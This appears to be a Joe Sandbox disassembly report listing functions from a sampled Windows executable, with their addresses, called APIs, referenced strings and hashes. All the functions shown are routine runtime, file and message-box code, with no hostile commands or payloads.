FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A64A
FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A65B
FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A66C
SetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A687

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
Instruction ID: 1712ff77c2c2f812952db0169e82a01ca582ab220fab28333c2db2069312884c
Opcode Fuzzy Hash: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
Instruction Fuzzy Hash: F8114D20F4C282A2FA74A7395A4917D6682EF497B4F5847B4E93E877DEDE2CF4024701

Function 00007FF690012300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF690012338
DialogBoxIndirectParamW.USER32 ref: 00007FF6900123FE
DeleteObject.GDI32 ref: 00007FF690012431
DestroyIcon.USER32 ref: 00007FF690012443

Strings

Unhandled exception in script, xrefs: 00007FF690012368

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction ID: 9718d0a7aaf3402a58deb879cf80911b94a83efd374cba32a11739075128efa2
Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction Fuzzy Hash: 15314A26A08A8299EB20EB75E8556F963A1FF88788F440175EA4D87B99DF3CD101C700

Function 00007FF690012760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

MessageBoxW.USER32 ref: 00007FF69001283B
MessageBoxA.USER32 ref: 00007FF69001284F

Strings

%s%s: %s, xrefs: 00007FF6900127EC
Error/warning (ANSI fallback), xrefs: 00007FF690012843
Error, xrefs: 00007FF69001282C

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction ID: aafc1661d88d4142d1711722eb9821fdca361f80a0f20994158c0d283fc6799f
Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction Fuzzy Hash: 8C216072628A86A1E670DB20F4517EA6364FF88788F401176EB8C93B9DDF7CD645CB40

Function 00007FF690028DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF690028DC5
GetProcAddress.KERNEL32 ref: 00007FF690028DDB
FreeLibrary.KERNEL32 ref: 00007FF690028E02

Strings

mscoree.dll, xrefs: 00007FF690028DBC
CorExitProcess, xrefs: 00007FF690028DD4

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 751bbea9ba38823744a614e30e1e809dc607d79709df8e5bfa44484fecd930ba
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 88F0C225B09702A1EA308B34E4457392320EF59765F940675DA6E863F8DF2CD149C300

Function 00007FF690038678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6900386A0
_set_statfp.LIBCMT ref: 00007FF6900386BB
_set_statfp.LIBCMT ref: 00007FF6900386D7
_set_statfp.LIBCMT ref: 00007FF690038713

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: e724984797730fa90e32db63e4073420c7ed40392377d907ada1700d91663afc
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 53116DA3E5CB1221F6761139E857B791141EF5C364F2506F4EA6E867DECE6CE8418310

Function 00007FF69002A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6BF
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6DE
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A706
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A717
FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A728

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
Instruction ID: dd8688bed2fa91b585d41e487b2597ff2ec506bacc46b63a910c6d50682fe892
Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
Instruction Fuzzy Hash: 9F116D20B0C682A2FA78A33959455796191EF9A3A0F1443B4E83D877DEEE2CF9038704

Function 00007FF69002A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF69002A545
FlsSetValue.KERNEL32 ref: 00007FF69002A564
FlsSetValue.KERNEL32 ref: 00007FF69002A58C
FlsSetValue.KERNEL32 ref: 00007FF69002A59D
FlsSetValue.KERNEL32 ref: 00007FF69002A5AE

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
Instruction ID: 2ae81bc4248d244abe9a45e4bc44f5fc3d06ef8dbb0b98bf6e80129f9962475b
Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
Instruction Fuzzy Hash: AC112A60E4C647A2F978A33D48555BA2682DF5A370F5847B4D93ECA3DEED2CF4038241

Function 00007FF6900252B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900252EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF690025416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900254CC

Strings

verbose, xrefs: 00007FF6900252C0

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: eb54a1ac6184a59909325f8c75781b4a4b7c8bc66e784d2ab2d15e62ae36a6ef
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: 8391CF32E08A46A1E7319E39D45037D7395EB44B9AF8841B6DA5DC73D9EF3CE8468304

Function 00007FF69002EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002F1B7

Part of subcall function 00007FF690026D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690026D69

Strings

UTF-8, xrefs: 00007FF69002F136
UTF-16LEUNICODE, xrefs: 00007FF69002F155
ccs, xrefs: 00007FF69002F0F2

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 5e23132d9c985f3899df5f995a59a8db4605dca690be926f55aa1c8e3b45f56f
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: 86817F72E08243E5FB744E3DC2902793AA0EB11B88F5580B5DA09D779EDF2DE9439701

Function 00007FF69001C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69001C993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF69001CA2A
RtlUnwindEx.KERNEL32 ref: 00007FF69001CA84

Strings

csm, xrefs: 00007FF69001CA11

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: fb55907f387caae917aad7023664dd6efa0a123574666d35b35858e6805daa08
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: BB51AD32B19646AADBA4CB25E484E797795EB44B8CF548170EA4EC378CEF7DE841C700

Function 00007FF69001E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF69001E257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF69001E2A3

Strings

RCC, xrefs: 00007FF69001E273
MOC, xrefs: 00007FF69001E26B

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction ID: 794027cd627189bd3dadbf55c10aea86a09c4ba0f4ab54a2f7751203738c363d
Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction Fuzzy Hash: AA618332908BC5D6D7719B25E4407AEBBA0FB85798F044265EB9C43B99DF7CE190CB00

Function 00007FF69001E5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69001E5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF69001E6B8

Strings

csm, xrefs: 00007FF69001E5F2
csm, xrefs: 00007FF69001E70A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: 3fd517f166474d67959c88066563b432a082f811e25dd9fb4666c7e2419afad4
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 11517F36A08382E6EBB48B31944436C7BA0FB65B98F584176DA5D87BD9CF3CE451CB01

Function 00007FF690017530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF69001324C,?,?,00007FF690013964), ref: 00007FF690017642

Strings

%.*s, xrefs: 00007FF6900175FB
%s%c, xrefs: 00007FF6900175B4
\, xrefs: 00007FF6900175A7

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction ID: c0ecfcf65468bedfb534fe0e40f4d484c8ca3ea1439c6a524bb5eb6e3a5c1f4c
Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction Fuzzy Hash: 6C31E82171DAC1A5EA719B34E8507EA6265FB88BE8F404271EE6D837CDDF3CD6418700

Function 00007FF6900125F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

MessageBoxW.USER32 ref: 00007FF690012686
MessageBoxA.USER32 ref: 00007FF69001269A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF69001268E
Error, xrefs: 00007FF690012677

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 33221a58fbb2fdf55098bcd9f466b3ff1a022d4ea694a439cd0533ccf5d5716e
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: DE116D72628B85A1EA718B20F451BA93364FB48B88F905175EB5D97788DF7CD605C700

Function 00007FF690012870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

MessageBoxW.USER32 ref: 00007FF690012906
MessageBoxA.USER32 ref: 00007FF69001291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF69001290E
Warning, xrefs: 00007FF6900128F7

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: e1d9295304c5a4139dc5b94108194141179b88569957d767db62f109107c1a72
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 98119A72628B85A1EA718B20F451BA93368FB48B88F901176EB8C97748DF3CD609C700

Function 00007FF69002B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF69002B92F
WriteFile.KERNEL32 ref: 00007FF69002BBF7
WriteFile.KERNEL32 ref: 00007FF69002BC3D
GetLastError.KERNEL32 ref: 00007FF69002BCF3

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction ID: c06975508efff32dfaf1af3e4da627690b783b6fe90eb2097004a056e7bc40af
Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction Fuzzy Hash: 67D1DF72B18A81A9E721CF79D4402AC37B2FB44B98B1442B6DE5E97B9DDE38D517C300

Function 00007FF69002EC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF69002ED8C
_get_daylight.LIBCMT ref: 00007FF69002ED9D
_get_daylight.LIBCMT ref: 00007FF69002EDAE
_isindst.LIBCMT ref: 00007FF69002EE79

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction ID: 0a8b2a5830c00f955093f211534c99cfd1cb67b46a4c02a8bc7aadb920f1aca5
Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction Fuzzy Hash: EB51F372F04251AAEF38DB7899456BC2BA1EB14358F110179DE1E92BE9DF38E4038700

